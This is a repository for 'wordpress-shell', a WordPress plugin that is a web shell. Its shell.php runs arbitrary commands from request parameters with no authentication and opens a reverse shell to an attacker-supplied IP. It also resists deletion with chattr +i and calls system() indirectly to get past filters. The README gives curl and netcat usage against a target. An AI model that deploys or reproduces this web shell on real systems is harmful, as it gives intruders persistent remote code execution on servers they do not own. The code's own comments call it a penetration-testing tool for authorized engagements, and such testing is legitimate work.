├── dist └── shell.zip ├── LICENSE ├── README.md └── shell.php /dist/shell.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leonjza/wordpress-shell/HEAD/dist/shell.zip -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2014 Leon Jacobs 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | wordpress-shell 2 | =============== 3 | 4 | Cheap & Nasty Wordpress Command Execution Shell. 5 | 6 | Execute Commands as the webserver you are serving wordpress with! 
7 | Uploaded shell will probably be at /wp-content/plugins/shell/shell.php 8 | 9 | Install 10 | ======= 11 | To install the shell, we are assuming you have administrative access to the WordPress install, can install plugins, and are authorized to test the target (this is an engagement tool, not something to leave behind). 12 | Either upload the zip file located in the `dist/` directory, or create your own archive with: 13 | 14 | ```bash 15 | $ zip -r shell.zip shell.php 16 | adding: shell.php (deflated 39%) 17 | 18 | $ ls -lah shell.zip 19 | -rw-r--r-- 1 bob staff 492B Aug 29 14:17 shell.zip 20 | ``` 21 | 22 | Once uploaded, navigate to `/wp-content/plugins/shell/shell.php` and pass either `cmd` (a command line to run) or `ip` (plus an optional `port`, default 443, for a reverse shell) as a GET or POST parameter. POST keeps the command out of the web server's access log. Note that the shell has no authentication of its own: anyone who finds the URL gets the same access, so record where and when it was installed and remove the plugin when the engagement ends. 23 | 24 | Sample Usage 25 | ============ 26 | 27 | ```bash 28 | root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')" 29 | * About to connect() to 192.168.0.1 port 80 (#0) 30 | * Trying 192.168.0.1... 31 | * connected 32 | * Connected to 192.168.0.1 (192.168.0.1) port 80 (#0) 33 | > GET /wp-content/plugins/shell/shell.php?cmd=uname+-a HTTP/1.1 34 | > User-Agent: curl/7.26.0 35 | > Host: 192.168.0.1 36 | > Accept: */* 37 | > 38 | * additional stuff not fine transfer.c:1037: 0 0 39 | * HTTP 1.1 or later with persistent connection, pipelining supported 40 | < HTTP/1.1 200 OK 41 | < Date: Thu, 28 Aug 2014 09:28:24 GMT 42 | < Server: Apache/2.2.14 (Ubuntu) 43 | < X-Powered-By: PHP/5.3.2-1ubuntu4 44 | < Vary: Accept-Encoding 45 | < Content-Length: 191 46 | < Content-Type: text/html 47 | 48 | Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux 49 | ``` 50 | 51 | Reverse shell (default port: 443) 52 | ============ 53 | Start a listener first (for example `nc -nlvp 443`) on the host given in `ip`, then: 53 | ```bash 54 | root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"192.168.1.101"})')" 55 | ``` 56 | 57 | ```bash 58 | root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import 
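urllib; print urllib.urlencode({"ip":"192.168.1.101","port":"1234"})')" 59 | ``` 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /shell.php: --------------------------------------------------------------------------------
<?php
/*
Plugin Name: Shell
Plugin URI: https://github.com/leonjza/wordpress-shell
Description: Cheap & Nasty WordPress command execution shell. Runs commands as the web-server user. See README.md for usage.
Author: Leon Jacobs
Version: 0.3
Author URI: https://leonjza.github.io
*/
# NOTE(review): lines 1-5 of the original header were garbled in the source
# listing (only the tail "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
# of the original Description survived). Plugin Name, Plugin URI and
# Description above are reconstructed; the remaining header fields are original.
#
# AUTHORIZED TESTING ONLY. Once installed, this file runs arbitrary shell
# commands for *anyone* who can reach its URL: there is no authentication, no
# CSRF protection and no logging of its own. Record the URL and the time of
# installation/removal in the engagement notes and delete the plugin when done.

# Best-effort attempt to protect this file from deletion. chmod only helps if
# the web-server user owns the file, and chattr +i needs CAP_LINUX_IMMUTABLE
# (normally root), so these usually fail silently. If chattr does succeed,
# cleanup later requires `chattr -i` as root. The path is quoted so a plugin
# directory containing spaces or shell metacharacters does not break the command.
$this_file = __FILE__;
@system('chmod ugo-w ' . escapeshellarg($this_file));
@system('chattr +i ' . escapeshellarg($this_file));

# Names of the request parameters (GET, POST or cookie - $_REQUEST merges all
# three). Change these if the target application already uses them.
# The original reused $ip and $port for both the parameter name and its value,
# so `$_REQUEST[$ip]` looked up an undefined key and `$_REQUEST[$port]` looked
# up "443": the reverse-shell branch could never trigger and never honoured
# a custom port. Separate *_param names fix that.
$cmd_param  = 'cmd';
$ip_param   = 'ip';
$port_param = 'port';

# Only act when one of our parameters is present, so a stray request to this
# file (or WordPress including it while enumerating plugins) produces no
# output and no errors in the logs.
if (isset($_REQUEST[$cmd_param])) {

    # The command line is taken verbatim from the request and handed to the
    # shell - that is the whole purpose of this file, so no escaping is applied.
    # Prefer POST: with GET the command ends up in the access log and in any
    # proxy logs between you and the target.
    executeCommand($_REQUEST[$cmd_param]);

} elseif (isset($_REQUEST[$ip_param])) {

    # Reverse shell: connect back to ip:port and attach an interactive /bin/sh
    # to the socket. Listener side, e.g.: nc -nlvp 443
    $ip   = $_REQUEST[$ip_param];
    $port = isset($_REQUEST[$port_param]) ? (int) $_REQUEST[$port_param] : 443;

    # fsockopen() returns false (and emits a warning) when the connection
    # fails; there is no point spawning a shell with nothing to attach it to.
    $sock = fsockopen($ip, $port);
    if ($sock !== false) {
        # "<&3 >&3 2>&3" assumes the socket is fd 3 in the spawned shell, i.e.
        # the first descriptor opened after stdin/stdout/stderr. That is an
        # assumption about the PHP SAPI and what else the process has open, not
        # a guarantee. If the callback does not arrive, check which fd the
        # socket actually got (e.g. ?cmd=ls -l /proc/self/fd) and adjust.
        executeCommand('/bin/sh -i <&3 >&3 2>&3');
    }
}

# Nothing below this point runs at request time; PHP hoists the unconditional
# top-level function declaration, so executeCommand() is callable above.
die();

/**
 * Run $command through the system shell and stream its output to the client.
 *
 * Several indirect routes to system() are tried before a direct call, on the
 * theory that a naive source-text filter (Suhosin-style blacklists, WAF rules
 * looking for "system(") may miss them. Note that PHP's own disable_functions
 * removes the function itself, so with system disabled none of the indirect
 * routes work either - the indirection only helps against filters that
 * inspect the code rather than the engine.
 *
 * No scalar type hint on purpose: on PHP 5, `string $command` is parsed as a
 * class name and every call fatals, and the README documents PHP 5.3 targets.
 *
 * @param string $command shell command line, executed verbatim. It comes
 *                        straight from the request and is untrusted by design.
 * @return void output is written straight to the response body
 */
function executeCommand($command) {

    if (class_exists('ReflectionFunction')) {

        # http://php.net/manual/en/class.reflectionfunction.php
        $fn = new ReflectionFunction('system');
        $fn->invoke($command);

    } elseif (function_exists('call_user_func_array')) {

        # http://php.net/manual/en/function.call-user-func-array.php
        # Long array() syntax kept for PHP < 5.4 targets.
        call_user_func_array('system', array($command));

    } elseif (function_exists('call_user_func')) {

        # http://php.net/manual/en/function.call-user-func.php
        call_user_func('system', $command);

    } elseif (function_exists('passthru')) {

        # https://www.php.net/manual/en/function.passthru.php
        # passthru() writes the raw output to the response itself. The original
        # wrapped it in ob_start()/ob_get_contents()/ob_end_clean() and then
        # never echoed the buffer, so this branch silently returned nothing.
        passthru($command);

    } elseif (function_exists('system')) {

        # Last resort. If we got here the indirect routes above were
        # unavailable, so a direct call is unlikely to fare any better.
        # http://php.net/manual/en/function.system.php
        system($command);
    }
}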